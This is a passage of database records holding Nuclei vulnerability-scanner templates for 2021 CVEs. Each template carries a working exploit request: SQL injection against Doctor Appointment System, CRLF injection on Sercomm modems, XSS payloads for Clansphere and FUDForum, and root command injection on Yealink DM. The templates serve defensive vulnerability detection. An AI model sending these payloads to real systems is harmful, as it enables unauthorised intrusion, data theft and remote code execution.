vendor: doctor_appointment_system_project\n product: doctor_appointment_system\n tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project\n\nhttp:\n - raw:\n - |\n POST /patient/search_result.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n expertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit=\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 
\"c8c605999f3d8352d7bb792cf3fdb25b\"\n - \"Doctor Appoinment System\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a402101096ce7def9e01253aed74d686ca491e1c4b6fad1a0591a5662520cb8e02203e62bb17eb3da7850635c125c56f5cb8f51ba1520a03e9a3c04ff2998a38a8b1:922c64590222798bb761d5b6d8e72950", "hash": "4cb727cf4c7af9eb00fba7cfe4901550", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308312" }, "name": "CVE-2021-27132.yaml", "content": "id: CVE-2021-27132\n\ninfo:\n name: Sercomm VD625 Smart Modems - CRLF Injection\n author: geeknik\n severity: critical\n description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to Carriage Return Line Feed (CRLF) injection via the Content-Disposition header.\n impact: |\n Successful exploitation of this vulnerability could lead to various attacks, including session hijacking, cross-site scripting (XSS), and cache poisoning.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n reference:\n - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132\n - http://sercomm.com\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27132\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-27132\n cwe-id: CWE-74\n epss-score: 0.04569\n epss-percentile: 0.92334\n cpe: cpe:2.3:o:sercomm:agcombo_vd625_firmware:agsot_2.1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sercomm\n product: agcombo_vd625_firmware\n tags: cve2021,cve,crlf,injection,sercomm,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n 
words:\n - \"Content-Disposition: attachment;filename=test.txt\"\n - \"Set-Cookie:CRLFInjection=Test\"\n - \"Location: interact.sh\"\n - \"X-XSS-Protection:0\"\n condition: and\n\n - type: status\n part: header\n status:\n - 404\n# digest: 4a0a00473045022100c3c3ca233f54bacea5f71f78ea26b8267179e45ee6c3a7364dcc8acd6241805202200be48b9424898ee1b2e1029e0a0361512f63313a91b2df49e94a43ab6940d9a2:922c64590222798bb761d5b6d8e72950", "hash": "46af02094b629d7336de720628359dde", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308313" }, "name": "CVE-2021-27309.yaml", "content": "id: CVE-2021-27309\n\ninfo:\n name: Clansphere CMS 2011.4 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the \"module\" parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Clansphere CMS or apply the vendor-supplied patch to fix the XSS vulnerability.\n reference:\n - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22module%22%20xss.md\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27309\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27309\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-27309\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42925\n cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: csphere\n product: clansphere\n tags: cve2021,cve,clansphere,xss,cms,unauth,csphere\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22>\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">.php'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205b00fbd835bf6365747ca455e3baf330c2bf123afee61ae0f8981aa1dab11857022100ef6c2c713eaa742043860a3f65409516d36de9988dd7053879e71c4db8f4a572:922c64590222798bb761d5b6d8e72950", "hash": "6f83de39d21c1523b7a93ee268b7f333", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308314" }, "name": "CVE-2021-27310.yaml", "content": "id: CVE-2021-27310\n\ninfo:\n name: Clansphere CMS 2011.4 - Cross-Site Scripting\n author: alph4byt3\n severity: medium\n description: Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the \"language\" parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.\n reference:\n - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22language%22%20xss.md\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27310\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27310\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-27310\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42925\n cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: csphere\n product: clansphere\n tags: cve2021,cve,xss,clansphere,csphere\n\nhttp:\n - method: GET\n 
path:\n - '{{BaseURL}}/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c4d6bb7af75b7f3a5accdbe8eb2cb10b8ac70a355e26cae903fd300883998e31022100a430ae5f4c7bf7057dfe5020dfce175c166844cd56e48a64b4f338400e4573c8:922c64590222798bb761d5b6d8e72950", "hash": "25fdd5e841cb12528b7e5b1e274f2a86", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308315" }, "name": "CVE-2021-27314.yaml", "content": "id: CVE-2021-27314\n\ninfo:\n name: Doctor Appointment System 1.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n SQL injection in admin.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the username parameter on the login page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html\n - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27314\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-27314\n cwe-id: CWE-89\n epss-score: 0.25703\n epss-percentile: 0.96281\n cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: doctor_appointment_system_project\n product: doctor_appointment_system\n 
tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /admin/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&password=test&submit=\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(body, \"Doctor Appoinment System\")'\n condition: and\n# digest: 490a0046304402207973d618635cb6ff182dd1151b2e15fef7b49ef6f6e99fbf1ef6b1f6f0f5cd64022038423bf061c1df525cfb84ab33d32f3681ff677745b0341ea30b995d34b637b5:922c64590222798bb761d5b6d8e72950", "hash": "4230e014f7f540b760eae80d8b4dce88", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308316" }, "name": "CVE-2021-27315.yaml", "content": "id: CVE-2021-27315\n\ninfo:\n name: Doctor Appointment System 1.0 - SQL Injection\n author: theamanrawat\n severity: high\n description: |\n Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the comment parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html\n - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27315\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-27315\n cwe-id: CWE-89\n epss-score: 0.06768\n epss-percentile: 0.93718\n cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n 
max-request: 1\n vendor: doctor_appointment_system_project\n product: doctor_appointment_system\n tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /contactus.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n firstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com&comment=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&submit=Send+Us\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 500'\n - 'contains(body, \"Medical Management System\")'\n condition: and\n# digest: 490a0046304402203675b5d024d7265ccc67751fa18a9456a08d9a6cfba7a69c677161ab2b54dc1202206a32db3d0a1aef4093b4b7de58ba04d3ca09b26a9ae9b2d325c794a17008810e:922c64590222798bb761d5b6d8e72950", "hash": "a6b97253d70000361c662047e0e2995b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308317" }, "name": "CVE-2021-27316.yaml", "content": "id: CVE-2021-27316\n\ninfo:\n name: Doctor Appointment System 1.0 - SQL Injection\n author: theamanrawat\n severity: high\n description: |\n Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the lastname parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html\n - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27316\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-27316\n cwe-id: CWE-89\n 
epss-score: 0.06768\n epss-percentile: 0.93718\n cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: doctor_appointment_system_project\n product: doctor_appointment_system\n tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /contactus.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n firstname={{randstr}}&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 500'\n - 'contains(body, \"Medical Management System\")'\n condition: and\n# digest: 4a0a0047304502205af27187e0d2039416c9a8f9600f75e28215199929e4ad988cd03e84e61c370d022100c759b577ed0406b9390cffefba1486233e1f5ebcd24930bed0d401d54a95459e:922c64590222798bb761d5b6d8e72950", "hash": "3c4ece22a7c74dc5cedfadd58cdbc4ae", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308318" }, "name": "CVE-2021-27319.yaml", "content": "id: CVE-2021-27319\n\ninfo:\n name: Doctor Appointment System 1.0 - SQL Injection\n author: theamanrawat\n severity: high\n description: |\n Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via email parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html\n - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html\n - 
https://nvd.nist.gov/vuln/detail/CVE-2021-27319\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-27319\n cwe-id: CWE-89\n epss-score: 0.08052\n epss-percentile: 0.9371\n cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: doctor_appointment_system_project\n product: doctor_appointment_system\n tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /contactus.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n firstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&comment={{randstr}}&submit=Send+Us\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 500'\n - 'contains(body, \"Medical Management System\")'\n condition: and\n# digest: 4a0a00473045022100fa576cee94b83d7c02ff3f920da22eb82e877217997d45a6843359a9ffc7662902205ede6cd0bf165f8d505aefe36928930b5e3b2e68db775a7a684c6f125a86d3e4:922c64590222798bb761d5b6d8e72950", "hash": "b429db53e9b922f62397610c4cf5b226", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308319" }, "name": "CVE-2021-27320.yaml", "content": "id: CVE-2021-27320\n\ninfo:\n name: Doctor Appointment System 1.0 - SQL Injection\n author: theamanrawat\n severity: high\n description: |\n Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via firstname parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - 
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html\n - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27320\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-27320\n cwe-id: CWE-89\n epss-score: 0.09267\n epss-percentile: 0.94102\n cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: doctor_appointment_system_project\n product: doctor_appointment_system\n tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /contactus.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n firstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 500'\n - 'contains(body, \"Medical Management System\")'\n condition: and\n# digest: 4a0a00473045022100dd206ca7187b6ed469ca7ac639cf6d228f7811e762a78cdf8d6c89bd2defdf690220564ac31e30c8bf0db3d6b80d2f2903b35cb7fe2800fc655540dd2602b9e16acb:922c64590222798bb761d5b6d8e72950", "hash": "abb2d5ba1e54d3cbb015c017ce924d35", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30831a" }, "name": "CVE-2021-27330.yaml", "content": "id: CVE-2021-27330\n\ninfo:\n name: Triconsole Datepicker Calendar <3.77 - Cross-Site Scripting\n author: pikpikcu,daffainfo\n severity: medium\n description: |\n Triconsole Datepicker Calendar before 3.77 contains a cross-site scripting vulnerability in calendar_form.php. 
Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Triconsole Datepicker Calendar that properly validates user input to prevent XSS attacks.\n reference:\n - https://www.exploit-db.com/exploits/49597\n - http://www.triconsole.com/\n - http://www.triconsole.com/php/calendar_datepicker.php\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27330\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-27330\n cwe-id: CWE-79\n epss-score: 0.00437\n epss-percentile: 0.74213\n cpe: cpe:2.3:a:triconsole:datepicker_calendar:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: triconsole\n product: datepicker_calendar\n google-query: intitle:TriConsole.com - PHP Calendar Date Picker\n tags: cve2021,cve,xss,edb,triconsole\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/calendar/calendar_form.php/\">'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'TriConsole.com - PHP Calendar Date Picker'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b72158929a2c012eca6ad612ac51258afbd4964fc02c47f4b57368e7cf0bedd30220196fa0ae9b42667f6ed26e6b60c4a741f049d9d05d86ccd0dcdddfcb0b8641c7:922c64590222798bb761d5b6d8e72950", "hash": "59eb81c73453da7c66d065dd225e4843", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30831b" }, "name": "CVE-2021-27358.yaml", "content": "id: CVE-2021-27358\n\ninfo:\n name: 
Grafana Unauthenticated Snapshot Creation\n author: pdteam,bing0o\n severity: high\n description: Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set.\n impact: |\n An attacker can create snapshots of sensitive data without authentication, potentially leading to unauthorized access and data exposure.\n remediation: |\n Upgrade to the latest version of Grafana that includes a fix for CVE-2021-27358 or apply the provided patch to mitigate the vulnerability.\n reference:\n - https://phabricator.wikimedia.org/T274736\n - https://grafana.com/docs/grafana/latest/release-notes/release-notes-7-4-2/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27358\n - https://github.com/grafana/grafana/blob/master/CHANGELOG.md\n - https://github.com/grafana/grafana/blob/master/CHANGELOG.md#742-2021-02-17\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n cvss-score: 7.5\n cve-id: CVE-2021-27358\n cwe-id: CWE-306\n epss-score: 0.02415\n epss-percentile: 0.89689\n cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: grafana\n product: grafana\n shodan-query: title:\"Grafana\"\n tags: cve2021,cve,grafana,unauth\n\nhttp:\n - raw:\n - |\n POST /api/snapshots HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"dashboard\": {\"editable\":false,\"hideControls\":true,\"nav\":[{\"enable\":false,\"type\":\"timepicker\"}],\"rows\": [{}],\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{},\"timezone\":\"browser\",\"title\":\"Home\",\"version\":5},\"expires\": 3600}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"deleteUrl\":'\n - '\"deleteKey\":'\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n# digest: 
4b0a00483046022100a246c958300ef66facdc279038dc6c006e6f25ee083e21d2b61f2c05f97608bf0221008541a137b7ea439c0235149d62f678ad167cb4386a17f4d1a8f94bc9ca3ff0a3:922c64590222798bb761d5b6d8e72950", "hash": "8122dd0fb5a2cf82c3e694006985c757", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30831c" }, "name": "CVE-2021-27519.yaml", "content": "id: CVE-2021-27519\n\ninfo:\n name: FUDForum 3.1.0 - Cross-Site Scripting\n author: kh4sh3i\n severity: medium\n description: |\n FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the \"srch\" parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/49942\n - https://github.com/fudforum/FUDforum/issues/2\n - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27519\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-27519\n cwe-id: CWE-79\n epss-score: 0.00217\n epss-percentile: 0.59015\n cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: fudforum\n product: fudforum\n shodan-query: 'http.html:\"Powered by: FUDforum\"'\n tags: cve2021,cve,xss,fudforum,edb,packetstorm\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index.php?SQ=0&srch=x\"+onmouseover%3Dalert%281%29+x%3D\"&t=search&btn_submit.x=0&btn_submit.y=0'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'highlightSearchTerms(\"x\" onmouseover=alert(1) x=\"\");'\n\n - 
type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f69ec7d4711d599dd40f92495d22b5d93ac3a8db167fe425f7b024ff41d888c5022030ad77de1858a49de1ff57b58e699741fa419442f186dd2a419fa4f433ee8138:922c64590222798bb761d5b6d8e72950", "hash": "9ecc2eb42d677c80954e9a25de40db21", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30831d" }, "name": "CVE-2021-27520.yaml", "content": "id: CVE-2021-27520\n\ninfo:\n name: FUDForum 3.1.0 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n FUDForum 3.1.0 contains a cross-site scripting vulnerability. An attacker can inject JavaScript via index.php in the author parameter, thereby possibly stealing cookie-based authentication credentials and launching other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/49943\n - https://github.com/fudforum/FUDforum/issues/2\n - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27520\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-27520\n cwe-id: CWE-79\n epss-score: 0.00217\n epss-percentile: 0.59015\n cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: fudforum\n product: fudforum\n shodan-query: html:\"FUDforum\"\n tags: cve2021,cve,packetstorm,xss,fuddorum,edb,intrusive,fudforum\n\nhttp:\n - method: GET\n path:\n - 
'{{BaseURL}}/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D'\n - '{{BaseURL}}/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D%22'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - onmouseover=alert(document.domain) x=\n - FUDforum\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204a90f383fd73372c3a83f6f9db99d16bf93b8ee0401f22ad6088697eed2957d3022100a2c3bfa5bb7c6bc1edeeea494b9ad3a53468a5b98c9599afc9e4687efb802040:922c64590222798bb761d5b6d8e72950", "hash": "8c8ff7b067b0c2bf0207a13cdfc8d03a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30831e" }, "name": "CVE-2021-27561.yaml", "content": "id: CVE-2021-27561\n\ninfo:\n name: YeaLink DM 3.6.0.20 - Remote Command Injection\n author: shifacyclewala,hackergautam\n severity: critical\n description: Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.\n remediation: |\n Update to the latest firmware version provided by the vendor to mitigate this vulnerability.\n reference:\n - https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561\n - https://ssd-disclosure.com/?p=4688\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-27561\n cwe-id: CWE-78\n epss-score: 0.97434\n epss-percentile: 0.99939\n cpe: 
cpe:2.3:a:yealink:device_management:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: yealink\n product: device_management\n tags: cve2021,cve,rce,yealink,mirai,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'uid'\n - 'gid'\n - 'groups'\n condition: and\n\n - type: word\n part: header\n words:\n - 'application/json'\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - \"(u|g)id=.*\"\n# digest: 4a0a00473045022100e84f3b6f3b4431895a29b93f5706225e723a3306c1a1fba02583aeacd7fd802f02200c4f466848e8a98fdcc690f9d5d193830228d10b8759a412ce478da775f757dc:922c64590222798bb761d5b6d8e72950", "hash": "e4ec82d0549d13c8da9c040caec86fba", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30831f" }, "name": "CVE-2021-27651.yaml", "content": "id: CVE-2021-27651\n\ninfo:\n name: Pega Infinity - Authentication Bypass\n author: idealphase,daffainfo\n severity: critical\n description: Pega Infinity versions 8.2.1 through 8.5.2 contain an authentication bypass vulnerability because the password reset functionality for local accounts can be used to bypass local authentication checks.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and 